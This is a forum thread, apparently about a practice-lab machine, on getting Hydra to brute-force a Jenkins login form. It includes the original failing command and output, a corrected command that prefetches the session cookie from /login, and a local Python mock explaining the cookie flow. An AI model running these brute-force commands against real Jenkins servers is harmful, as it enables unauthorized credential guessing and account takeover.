Hydra question

Hello, I need some help with hydra tool. I am trying to bruteforce Jenkins on one of the starter machines.

└─$ hydra -L testuser -P testpass 10.129.8.179 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:Invalid username or password" -s 8080 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-26 15:26:34
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:2/p:6), ~1 try per task
[DATA] attacking http-post-form://10.129.8.179:8080/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:Invalid username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[STATUS] attack finished for 10.129.8.179 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-26 15:26:38

Hydra keeps reporting 0 passwords found, despite the fact that the password and username are definitely in the lists (12 records total). I also tried the :F=/loginError option, and the tool still can't pick out the login/password. What am I doing wrong? Thanks

I was battling the same problem and finally managed to resolve it, and maybe even understand it. My theory after tinkering with Wireshark:

When you do the login POST request, you are supposed to provide a cookie containing the session id. If the credentials are correct, the backend marks the session id as authorized, and the client is redirected to make a GET request to the root page (10.129.8.169:8080/ in your case). When the client makes that GET request with the authorized session-id cookie, the backend finally responds with a redirect to the Jenkins dashboard.

The problem is that Hydra doesn't know how to get the cookie initially, so even when the POST request is made with the correct credentials, because it is made without a cookie, no session id gets authorized. In Hydra's case, when the client is asked to make a new GET request to root, Hydra doesn't supply any cookie, and you get a 403 Forbidden response (authentication required) instead of being redirected to the Jenkins dashboard.

To fix this, simply add C=/login to the parameters. The C parameter lets Hydra know that it first needs to grab the cookie from the /login page, and then it will use that cookie in all further requests. Example:

hydra -l root -p password 10.129.8.179 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:C=/login:Invalid" -s 8080 -v

Specifically, it seems like Hydra gets confused by the 403 status code, because, as your console output shows, it is quite easy to spot the successful login even without the cookie.
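The flow the answer above describes, as an added example that is not part of the original thread and is not Jenkins or Hydra code: a small in-process mock server that behaves the way the answer says the backend does (a session cookie issued at /login must accompany the POST for the login to "stick"; the POST redirects to / either way; / then either redirects to the dashboard or answers 403), plus a client that tries the login with and without first fetching the cookie from /login, which is what the C=/login option makes Hydra do. The credentials, the cookie name JSESSIONID, the /dashboard path and the response bodies are constructed assumptions, not observed Jenkins behaviour.

```python
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Constructed values for the mock; none of these come from the original thread.
VALID_USER, VALID_PASS = "admin", "password"
COOKIE_NAME = "JSESSIONID"   # assumed cookie name
SESSIONS = {}                # session id -> True once the login POST authorized it


class MockJenkins(BaseHTTPRequestHandler):
    """Models the answer's theory, not real Jenkins: only a session that already
    holds a cookie from /login can be marked authorized by the login POST."""

    def _session(self):
        for part in self.headers.get("Cookie", "").split(";"):
            name, _, value = part.strip().partition("=")
            if name == COOKIE_NAME and value in SESSIONS:
                return value
        return None

    def _redirect(self, location):
        self.send_response(302)
        self.send_header("Location", location)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def _page(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == "/login":                 # hands out a fresh, unauthorized session
            sid = secrets.token_hex(8)
            SESSIONS[sid] = False
            self.send_response(200)
            self.send_header("Set-Cookie", f"{COOKIE_NAME}={sid}; Path=/; HttpOnly")
            self.send_header("Content-Length", "0")
            self.end_headers()
        elif self.path == "/":                    # authorized session -> dashboard, else 403
            sid = self._session()
            if sid and SESSIONS[sid]:
                self._redirect("/dashboard")
            else:
                self._page(403, "Authentication required")
        elif self.path == "/dashboard":
            self._page(200, "Welcome to Jenkins!")
        elif self.path == "/loginError":
            self._page(200, "Invalid username or password")
        else:
            self._page(404, "not found")

    def do_POST(self):
        form = parse_qs(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode())
        creds = (form.get("j_username", [""])[0], form.get("j_password", [""])[0])
        if self.path != "/j_spring_security_check" or creds != (VALID_USER, VALID_PASS):
            self._redirect("/loginError")
            return
        sid = self._session()
        if sid:
            SESSIONS[sid] = True                  # only a presented session gets authorized
        self._redirect("/")                       # same redirect with or without a cookie

    def log_message(self, *args):
        pass


def start_mock_server():
    """Start the mock on an ephemeral loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), MockJenkins)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def attempt_login(port, user, pw, prefetch_cookie, max_hops=5):
    """One login try. Returns (redirect locations followed, final status, final body)."""
    conn = http.client.HTTPConnection("127.0.0.1", port)
    cookie = None
    if prefetch_cookie:                           # the step C=/login adds to Hydra's flow
        conn.request("GET", "/login")
        resp = conn.getresponse()
        resp.read()
        cookie = resp.getheader("Set-Cookie").split(";")[0]
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if cookie:
        headers["Cookie"] = cookie
    body = f"j_username={user}&j_password={pw}&from=&Submit=Sign+in"
    conn.request("POST", "/j_spring_security_check", body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    hops = []
    while resp.status in (301, 302, 303) and len(hops) < max_hops:
        location = resp.getheader("Location")
        hops.append(location)
        conn.request("GET", location, headers={"Cookie": cookie} if cookie else {})
        resp = conn.getresponse()
        data = resp.read()
    conn.close()
    return hops, resp.status, data.decode()


if __name__ == "__main__":
    _, port = start_mock_server()
    for prefetch in (True, False):
        print("prefetch cookie:", prefetch, attempt_login(port, VALID_USER, VALID_PASS, prefetch))
    print("bad password:", attempt_login(port, VALID_USER, "wrong", True))
```

With the cookie fetched first, the correct credentials end at /dashboard; without it, the same correct POST still redirects to / but that GET comes back 403, which is the pattern the answer reads out of the console output above. A wrong password redirects to /loginError in both cases, which is why matching on "Invalid username or password" alone is not enough to tell the 403 case apart.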